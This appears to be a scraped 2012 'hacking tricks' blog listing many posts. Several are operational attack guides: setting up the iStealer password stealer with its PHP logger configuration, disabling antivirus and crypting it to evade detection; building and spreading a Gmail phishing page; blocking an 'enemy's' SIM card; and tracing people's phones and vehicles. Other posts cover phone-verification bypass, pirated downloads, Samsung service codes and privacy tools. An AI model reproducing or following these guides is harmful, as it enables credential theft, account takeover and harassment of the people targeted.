Ethical hacking ebooks| tips and tricks| windows tricks| software| mobile| infotechno| free download with full version| games| ipad and; iphone|Android| google | java | c language | mobile | facebook | whatsapp | Earn money


Hack Passwords Using iStealer

9/03/2012

There are different way's to steal passwords.

I want to be able to steal passwords from cookie files with 1 click,


well what do you know it exists! It's a cookie stealer called iStealer ( 6.0 is newest version ).
It steals every cookie password from the slave's browser, and shows it to the attacker.
So if you do it correctly you will have hotmail, netlog, facebook, WoW, rapidshare and other passwords from lots of people in no time.

I'll set one up, and will go thru all the details.

Prepare yourself

1st Download iStealer 6.0 ( link is at the bottom of the thread )

2th Disable your virusscanner, this is because your antivirus sees the iStealer program as a keylogger ( it's acctualy a CookieStealer but whatever )

3th Register domain and hosting
iStealer requires a webserver, this is because when someone click's your own made "Virus" it has to send the passwords and usernames somewhere.
I suggest http://www.000webhost.com/ for free webhosting, so register a domain there.

The registration can take a while, but when u have your domain registered, go to the cPanel.
Once your on the cPanel, click on MySQL ( this is under the tab "Software / Services" )

Now create a new database and user. Something like this

MySQL database name: a7356028_stealer
MySQL user name: a7356028_theadmin
Password for MySQL user: 123456
Then click create database.

Configure to steal

Now extract the downloaded zip file ( below the thread ).
You should have iStealer 6.0.exe, and a map called PHP Logger.
Open index.php in the map PHP Logger with notepad or any text-editor.

you see a bunch of codes, but dont worry, we only need the first part of the php file. Search for the CONFIGURATION section, this will be in it

$dbHost = "localhost"; // MySQL host
$dbUser = "suicide_admin"; // MySQL username
$dbPass = "GOX"; // MySQL password
$dbDatabase = "suicide_is"; // MySQL database name

$username = "admin"; // Login Username
$password = "GOV"; // Login Password
$logspage = 100; // Number of logs per page

Configure this with you own MySQL database information. Then it should look like this

$dbHost = "localhost"; // MySQL host
$dbUser = "a7356028_theadmin"; // MySQL username
$dbPass = "123456"; // MySQL password
$dbDatabase = "a7356028_stealer"; // MySQL database name

$username = "admin"; // Login Username
$password = "whatuwant"; // Login Password
$logspage = 100; // Number of logs per page

Note that the $username and $password variable will be used to log in your website, so choose it carefully.

Now save the file.

Loading it up
Go back to the cPanel of your site, and click on File Manager ( under the tab "Files )
Log in with your 000webhost password and continue.
Click on public_html map, and once ur in it, click Upload.
Select the index.php you saved before, and the style.css

Upload it.

Then just browse to your domain name in your browser, and login with the $username and $password you choose in the index.php ( in my case admin and whatuwant ). Now you have the page where the passwords and usernames are stored.

Making the Stealer File!

Now everything is set up, we have to make our CookieStealer file.
Just open iStealer 6.0.exe, enter your domain on the top ( edit things you want, like changing the icon etc ).

Click build!

Testing, crypting, spreading?

Testing?

To see if it works, just click it yourself! If you enter your website, and see your passwords and usernames, it works!

Crypting?

Well, it worked on yourself, because your antivirus is not up, but most of the people have antivirus scanner on all the time, so you might think of crypting it ( making it undetectable ), i'll talk about this later ( and show u some tools ), in the main time, use Google!

Metasploit: A Penetration Tester's Guide free download

9/03/2012

"The Metasploit Framework makes discovering, exploiting, and sharing vulnerabilities quick and relatively painless. But while Metasploit is used by security professionals everywhere, documentation is lacking and the tool can be hard to grasp for first-time users. Metasploit: A Penetration Tester's Guide fills this gap by teaching you how to harness the Framework, use its many features, and interact with the vibrant community of Metasploit contributors. The authors begin by building a foundation for penetration testing and establishing a fundamental methodology. From there, they explain the Framework's conventions, interfaces, and module system, as they show you how to assess networks with Metasploit by launching simulated attacks.




   Download


 Having mastered the essentials, you'll move on to advanced penetration testing techniques, including network reconnaissance and enumeration, client-side attacks, devastating wireless attacks, and targeted social engineering attacks. Metasploit: A Penetration Tester's Guide willteach you how to: Find and exploit unmaintained, misconfigured, and unpatched systems Perform reconnaissance and find valuable information about your target Bypass anti-virus technologies and circumvent security controls Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery Use the Meterpreter shell to launch further attacks from inside the network Harness standalone Metasploit utilities, third-party tools, and plug-ins Learn how to write your own Meterpreter post exploitation modules and scripts You'll even touch on exploit discovery for zero-day research, write a fuzzer, port existing exploits into the Framework, and learn how to cover your tracks. Whether your goal is to make your own networks more secure or to put someone else's to the test, Metasploit: A Penetration Tester's Guide will take you there and beyond"--

Copyright.com Registered & Protected

Batch File Programming book for beginners written by Premkumar .S

9/03/2012


Batch File Programming book for beginners 



This book "Batch File Programming" is written after experimenting and testing all the snippets covered in this book. Batch File Programming is a pretty old one, but i have found lot of books that have not covered the dark side of the batch which still remains untold the ultimate goal of this book is to make the readers understand how it works what are the limitations of the batch what else is possible with a batch construction useful programs with various views creating a batch virus by misusing the commands creating a batch file to an executable and lot more.

Index


  • Batch File programming
  • Internal and external commands
  • Run line commands                                             
  • Batch operator
  • Basic commands
  • Environment variable
  • Lopping statement
  • Conditional statement
  • Commands associated with files and folder
  • Network troubleshooting comands
  • Code snippets
  • Virus programming
  • Converting batch to executable



Copyright.com Registered & Protected



SAMSUNG MOBILE T200 CODES

9/03/2012


Samsung codes


*#06# IMEI code
*#9998*4357# Help Menu
*#9998*5282# Java menu (GRPS/CSD settings for JAVA server)
*#9999#0# Monitor    
Mode                                                                              
*#9999# or *#9998*9999# Software Version
*#8888# or *#9998*8888# Hardware Version
*#9998*746# or *#9998*0746# or *#0746# Sim Infos
*#9998*523# or *#9998*0523# or *#0523# Display Contrast
*#9998*842# or *#9998*0842# or *#0842# Vibration On
*#9998*289# or *#9998*0289# or *#0289# Buzzer On
*#9998*288# or *#9998*0288# or *#0288# Battery & Field Infos
*#9998*377# or *#9998*0377# Error log
*#9998*778# or *#9998*0778# or *#0778# Sim Service table
*#9998*782# show date and alarm clock
*#8999*638# show network information
*#9998*5646# change operator logo at startup
*#9998*76# production number
*#9998*968# view melody for alarm
*#9998*585# Non-Volatile Memory (NVM)
*#3243948# Digital Audio Interference Off
*#32436837# Digital Audio Interference On


Samsung T100 secret codes



*#06# IMEI code
*#9999# -> Show Software Version
*#0001# -> Show Serial Parameters
*2767*3855# -> Full EEPROM Reset ( THIS CODE REMOVES SP-LOCK!!!! but also change IMEI to 447967-89-400044-0, you must use CHGIMEI to restore it)
*2767*2878# -> Custom EEEPROM Reset
*#8999*228# -> Battery status (capacity, voltage, temperature)
*#8999*246# -> Program status
*#8999*289# -> Change Alarm Buzzer Frequency
*#8999*324# -> Debug screens
Infotechno
*#8999*364# -> Watchdog
*#8999*377# -> EEPROM Error Stack
*#8999*427# -> Trace Watchdog
*#8999*523# -> Change LCD contrast
*#8999*544# -> Jig detect
*#8999*636# -> Memory status
*#8999*746# -> SIM File Size
*#8999*778# -> SIM Service Table
*#8999*785# -> RTK (Run Time Kernel) errors
*#8999*786# -> Run, Last UP, Last DOWN
*#8999*837# -> Software Version
*#8999*842# -> Test Vibrator
*#8999*862# -> Vocoder Reg
*#8999*872# -> Diag
*#8999*947# -> Reset On Fatal Error
*#8999*999# -> Last/Chk
*#8999*9266# -> Yann debug screen (=Debug Screens?)
*#8999*9999# -> Software version

Samsung T200 codes


#9324# Netmon (press the hangup key to exit)
#9998*JAVA# Edit GPRS/ CSD settings (S100 Only)
*#9998*Help# Help screen/ List of codes
*#9998*LOGO# Change operator Logo
*#9998*RTC# RTC Display
*#9998*Bat# Battery Status
*#9998*Buz# Turns Buzzer ON
*#9998*Vib# Turns Vibrator ON
*#9998*LCD# LCD Contrast
*#9998*9999# Softwre Version
*#9998*8888# Hardware Version
*#9998*377# NVM Error Log (?????)
*#9998*NET# SIM Network ID
Infotechno
*#9998*778# SIM Serv. Table
*#9998*SIM# SIM Info
*#9998*PN# Production No.
*#9998*968# Reminder Tune
*#9998*NVM# Displays Non-Volitile Memory Status
*#9999*C# ???????????????????
*#06# Displays phones I**I No.
***/// ***/// NOTE /// *** RED COLOR , they appear serious !!! Use at own risk !!!
*#9998*2576# Forces SIM Error
*#9998*DEAD# Forces Phone Crash
*2767*MEDIA# Resets the medis on the phone (deletes all downloaded pics/tones)
*2767*FULL# Resets the EEPRON *DANGEROUS*
*2767*CUST# Resets the Custom EEPRON
*2767*JAVA# Resets JAV downloads (deletes all downloaded midlits)
*2767*STACKRESET# Resets Stack
*2767*225RESET# ????????????????? * Dangerous *
*2767*WAP# Resets WAP Setting & Deletes Favorites


For all Samsung mobiles ! some codes are not applicable for all samsung mobile


ENJOY..............................................

Copyright.com Registered & Protected

How to Bypass Google 2 Step Verification

9/03/2012

Step 1. First of all go to www.k7.net and sign up there. This is a site where you can receive fax or voice calls without having a phone no. When you create an account on this site, it will provide you an unique phone no. of US.






Related Post
BYPASS ANY SMS VERIFICATION

Step 2. Now go for creating account on gmail, enter all the information as you want, but in Location fill 'United States'.

Step 3. Now click on 'I accept, create an account'.

Step 4. Now it will take you to mobile verification page. Here select the option of Voice call and fill the no. that you got from http://www.k7.net/

Step 5. Now you will get a mail having verification code as voice mail on that account from which you have registered on . Open it, download the attachment file and listen the code http://www.k7.net/

Step 6. Now enter the code of your voice mail in verification code. and click OK.Your account is ready now :)

HOW TO BLOCK YOUR ENEMY'S SIM CARD

9/03/2012

What is Sim card ?

A subscriber identity module or subscriber identification module (SIM) is an integrated circuit that securely stores the International Mobile Subscriber Identity (IMSI) and the relatedkey used to identify and authenticate subscribers on mobile telephony devices (such as mobile phones and computers).
                                                                                   
BY  wikipedia


HOW TO BLOCK YOUR ENEMY'S SIM CARD

Here  a simple trick for block your enemy sim card,Blocking a sim card is too simple.What you have to do is just enter the below code in the desired phone

**04*3814*7529*68243#

Entering of above code will ask you to enter the PUK code.To solve this issue just call customer care and get your PUK code.

Note:Entering of invalid PUK will cause permanent blocking of your SIM

YOUR OWN PORTABLE HACKING DEVICE

9/03/2012

MAKE IPOD/IPHONE A HACKING DEVICE


For all the complaints against apple for making it hard to get an

application registered and sold in the Apple store, there are some very
cool applications that can be used to set up your Iphone or other apple
Iphone OS based system into an excellent scanning and pseudo hacker
tool. These are the products you want to get if you are a security
engineer.

Security Scanner by Tommy Kammerer

A full featured port scanner for your Iphone, IPod or soon to be
Ipad that will help you figure out what systems have what ports open on
a remote computer. Cost is 1.99 and it works quite well, but at times a
bit slow depending on the network you are working with. This is the
coolest tool out there right now to use an IPod/Ipad/Iphone for
security work.



iNet Pro Network Scanner

This one is more detailed in terms of providing the name, IP
address and number of services running on each computer that it
encounters. Works excellent on an Iphone/IPod meaning it will work
great on an Ipad as well.



iTap RDP Client for Windows by HLW

This application completely rocks and is very easy to use. It works
on all the Iphone/Ipod systems that I tested this on and allowed remote
access. Saving off the data from the security scanner you can use this
tool for checking Windows based systems that might be improperly
secured.



iTap VNC Client

Same as the iTap RDP Client – just works on VNC systems and is the
most expensive application of the lot. Works very well and if the VNC
server is not set up right can help you figure out how to connect to
systems that are improperly configured or are not using a good password
system.



WiFi Analyzer

A very simple WiFi analyzer to let you know what networks are
around you and which ones are secure and which ones are not. Very
similar to any other wireless network analyzer on the market, this one
works on your IPod/Iphone and should work great on an Ipad.



With these tools you can turn your Iphone/IPod and soon to be Ipad
into a relatively robust and portable security/hacker system that will
let you know a lot about the networks you are connecting too. These are
some very cool applications and for around 40 dollars in total these
can be yours and working very quickly on your IPod/Iphone.

7 Sites to Send SMS for Free without Registration

9/01/2012

Most of us chat with our Friends using our Cell Phone and Many of us used to send SMS online to our Friends and Family . For that we need to Register in Some Site and always need to login into your account in order to send a SMS.  There are many sites to send Free SMS.



Related Post - How to get Email Alert on your Mobile for Free

But what if there will be a site where you can send SMS to anyone without Registering or without telling your Number to the Receiver. I mean you do not need to Register yourself in Order to send an SMS . In other words the receiver will not be able to know your Number. Yes this is now Possible.
Previously I have posted about Send free SMS without Registration in 160 Character , but now I have a List of few Sites from whcih you can send SMS for Free without Registration in India .

Here we Go -

SMSTI.com



No Registration or Login required. Send Unlimited 160 Characters Sms. You Check Message Delivery Report in Real Time. They Don’t Include Any Ads Along With Your Sms. Very High Speed Message Delivery System.

BollywoodMotion



Send Upto 500Charecters SMS. All GSM and CDMA network Supported. No ads and Very High speed delivery.

SeaSMS


Here you can send SMS and MMS throughout the World for free without Registration.

SMSMAFIA

 Free SMS India: Send free sms to all GSM CDMA mobiles from your computer without registration.

SmsMafia.iN

SMS PORTAL



Send Free SMS without registration

FooSMS



Write mobile number and message you want to send and click on send.


9TO9 SMS


So here were the List of the Top 7 SMS sites from where you can send SMS for Free without Registration.
Thanks

Trace Mobile numbers or IP-Address - How to?

8/29/2012

    Recently I came accross a website in which we can easily trace a Mobile number. For example , when we enter the 10 digit mobile number, then we get the Mobile Service provider, Location, City along with area. Thats really awesome.
    This tool will be really helpful specially for business persons to verify the location etc...
Here are some screen shots from this site..
    Just Enter your Ten Digit Mobile no. in the box shown below..and Click on Submit button

    After that the Information given by this website is Shown as below::
    Its really Awesome Website..Just Click Here to open this mind blowing website..


    Trace Vehical Number
    Trace Pin Code
    Trace IP Address
    WHOIS Trace
    Trace Fixed Line Number & More..

Hack Gmail using Advance Phishing Technique[UPDATED]

8/28/2012

Hi everyone, our blog got so many comments regarding email hacking , and thus I’m writing this tutorial using the best – Fool Proof attack known as  Phishing attack to hack Gmail Accounts, but it’s advance phishing attack so I’m going to give some steps to make your own Phishing attack possible, In this tutorial we’r going to make phishing page of gmail.




It’s only for Educational purpose don’t misuse it because I  will Not Hold any responsibility .

Step 1# First of all you’ll need Gmail verifying page as I earlier told you it is Advance Phishing attack to hack gmail, yahoo and lots more …!!
To make this page you need three file :
i) Gmail Verifying Page ( out phishing page )
ii) mailer.php (this file work for redirect your phishing page )
iii) hackedid.txt ( leave this blank , it will store the passwords )

You can download this package from Here :

Step 2# After downloading the page, Open this package with WinRAR or any extractor tools that you are using , you need to edit this page .

So, Open Reauthenticate.htm or gmail.html

Then find the email address “NCHAWRA6@GMAIL.COM
And just replace it with the email address that you want to HACK …!!! As showed in image below



Now open mailer.php and Hackedid.txt DO NOT edit this files, it will save the Password.

Step 3# Now you need website hosting to upload this file just go to
Don’t Panic !!! I am not going to ask you pay money for this, there are many websites available that provides free web hosting, we’ll be utilizing those free hosting here.
Out of all the best free hostings are:

www.ripway.com
www.t35.com
www.110mb.com
www.yourfreehosting.com 

which support .PHP  and ftp and than upload all files . Just open your Phishing page by right clicking on Reauthenticate.htm and copy this link …!!!

Step 4# Now in this steps you need some little bit of social engineering , just like chat with the  Victim and give him your phishing page link as you copied earlier and tell him that,  ” This link have many tutorial on Hacking”. When the Victim will Click on the link , Victim will see your phishing page. He will think that gmail is asking him to get verified because he saw that his email is already there and he just need to enter password to verify , and if he will put the password he will redirect to ( or according to your address as you edit in mailer.php ) and thus the Victim can’t even realize that he/she has been hacked.
See the Image:`

Now just go to hackedid.txt where you upload it …and BinGOO ….!!!! see below


.
If you have any problem regarding this tutorial or any other article, feel free to comment below !!!
 
Copyright.com Registered & Protected

TRACE VEHICLE AND GET ITS INFORMATION

8/28/2012

Hello Friends, today i am sharing an awesome trick with you all. Today I will tell you 
How to trace a vehicle and get its information ?


This is very easy trick, it can be easily done only one thing u need is vehicle number of victim whom u want to trace.


first of all open the below link -----


Enter the registration number of the vehicle which u want to trace and click on submit


for more information click n show detail option and get the remaining info....................




ENJOY  THE TRICK............................................


Copyright.com Registered & Protected

Recover My Files 4.9.4 Full Version Portable PC Software

8/27/2012

If you are worry about the lost files now you can recover deleted files emptied from the recycle bin or deleted due to any type of virus attack or infection or due to formating your hard disk. You can use Recover My Files data recovery Software that can easily recover deleted files emptied from the Windows Recycle Bin, or  lost due to the format or corruption of a hard drive, virus or Trojan infection, unexpected system shutdown or Software failure.

 
 

Download (link removed)


Few options are as under:
  • Search Windows temporary folders
  • Locate and recover files that have never been saved
  • No technical skills required
  • Recover My Files is fast and easy
Recover My Files is the perfect recovery tool and is compatible for:
  • Hard drives
  • USB drives
  • External storage units
  • Digital camera storage media
Copyright.com Registered & Protected

Windows 7 Tweaks free download

8/26/2012


 Windows 7 Tweaks free download


Written by bestselling author and the creator of tweaks.com Steve Sinchak, this unique guide provides you with the ultimate collection of hidden gems that will enable you to get the most out of Windows 7. Packed with more than 400 pages of insider tips, the book delves beneath the surface to reveal little-known ways to tweak, modify, and customize Windows 7 so you can get every ounce of performance from your operating system.















   




Password Protect your USB with MyUsbOnly tool

8/20/2012

Sometimes we want to password protect or lock our computer’s USB Ports to restrict certain users to use the USB port for their purposes. This is very helpful to the people who have secret information in their system and want to hide it from the others.
So if you also want to disable and password protect your USB drive for certain or all USB drives then here is the free software for you called MyUSBOnly.
MyUSBOnly is very good USB Password Protection software that not only adds security to your USB ports but also safeguard your system from the unauthorized access.
Features of MyUSBOnly:

Password protect USB ports.
  • Create a Device White list which allows access to certain USB Drives specified by you to access the system without any software (like your own drive).
  • Block untrusted USB Drives.
  • Run it invisibly and easily.
Whenever you insert any USB drive it will ask for the correct password, if entered wrong you won’t be able to use the drive.
Download MyUSBOnly

FireFox: Lock Your Browser MenuBar With Password

8/20/2012

FireFox Menu Locker.

If you want to make privacy for your browser or want to lock menu bar with password you can use this extension its really fantastic plugin. you can lock it any time with a click just right click and choose last option it will be locked when you restart your browser.when you restart your browser till you will not enter passwords you will not able you to use menu bar Here is also a tutorial how you can do this, i given full details below also check more Extension for Firefox.


You should note that the menu bar stays locked as long as you don’t unlock it. It increases privacy and prevents other users from accessing your history, bookmarks and other private browsing data.

How to:

  • Get Your Extension Here just go there and Install the extension.
  • After installation Restart your Browser and Right click on your browser and click on Lock Menubar.
  • It will show you a message (your menubar will be locked when you next time open your browser)


  • Restart your browser again and it will ask you password for when you click on menubar

Hope you like it if you really like feel free to share this.